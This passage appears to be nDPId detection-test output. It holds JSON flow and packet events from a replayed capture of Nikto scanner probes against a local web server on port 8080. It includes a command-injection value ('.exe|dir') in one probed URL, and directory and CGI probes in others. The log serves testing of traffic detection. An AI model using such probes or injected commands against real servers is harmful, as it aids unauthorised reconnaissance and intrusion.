(Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1576420276687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276687,"pkt":"AAAAAAAAAAAAAAAACABFAADFbA5AAEAG0CJ\/AAABfwAAAcGwH5CxUlQZUrozMIAYAED+uQAAAQEICp1m+vedZvr3R0VUIC8waFhDNlpVRS5odG1sIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1576420276689,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276689,"pkt":"AAAAAAAAAAAAAAAACABFAADEYhpAAEAG2hd\/AAABfwAAAcGyH5BKOloN5Bjd7oAYAED+uAAAAQEICp1m+vmdZvr5R0VUIC8waFhDNlpVRS5kbGwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1576420276690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276690,"pkt":"AAAAAAAAAAAAAAAACABFAADErQxAAEAGjyV\/AAABfwAAAcG0H5DNO5UfftfaRYAYAED+uAAAAQEICp1m+vqdZvr6R0VUIC8waFhDNlpVRS5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276690,"flow_last_seen":1576420276690,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276690,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1576420276692,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276692,"pkt":"AAAAAAAAAAAAAAAACABFAADEWZ5AAEAG4pN\/AAABfwAAAcG2H5D\/SmGKHR\/Uy4AYAED+uAAAAQEICp1m+vydZvr7R0VUIC8waFhDNlpVRS5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276692,"flow_last_seen":1576420276692,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276692,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1576420276694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276694,"pkt":"AAAAAAAAAAAAAAAACABFAADIBvJAAEAGNTx\/AAABfwAAAcG4H5DthT7meWwMh4AYAED+vAAAAQEICp1m+v6dZvr9R0VUIC8waFhDNlpVRS5leGV8ZGlyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1576420276695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276695,"pkt":"AAAAAAAAAAAAAAAACABFAADCG\/NAAEAGIEF\/AAABfwAAAcG6H5DzUiPolNWjYoAYAED+tgAAAQEICp1m+v+dZvr\/R0VUIC9pbmRleC5waHA\/IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQoNCg=="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1576420276697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276697,"pkt":"AAAAAAAAAAAAAAAACABFAADEgRRAAEAGux1\/AAABfwAAAcG8H5ABRrkFDdcmsoAYAED+uAAAAQEICp1m+wGdZvsBR0VUIC9jZ2kuY2dpLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi.cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1576420276699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276699,"pkt":"AAAAAAAAAAAAAAAACABFAADDtolAAEAGhal\/AAABfwAAAcG+H5DlK46S3uw4X4AYAED+twAAAQEICp1m+wKdZvsCR0VUIC93ZWJjZ2kvIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KDQo="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1576420276701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276701,"pkt":"AAAAAAAAAAAAAAAACABFAADEOWhAAEAGAsp\/AAABfwAAAcHAH5CIUQFyvT1whIAYAED+uAAAAQEICp1m+wWdZvsFR0VUIC9jZ2ktOTE0LyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-914\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1576420276703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276703,"pkt":"AAAAAAAAAAAAAAAACABFAADEOclAAEAGAml\/AAABfwAAAcHCH5AyFgHRa7MhPoAYAED+uAAAAQEICp1m+wadZvsGR0VUIC9jZ2ktOTE1LyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-915\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1576420276704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276704,"pkt":"AAAAAAAAAAAAAAAACABFAADAObpAAEAGAnx\/AAABfwAAAcHEH5ArBQGh2qRxvoAYAED+tAAAAQEICp1m+widZvsIR0VUIC9iaW4vIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 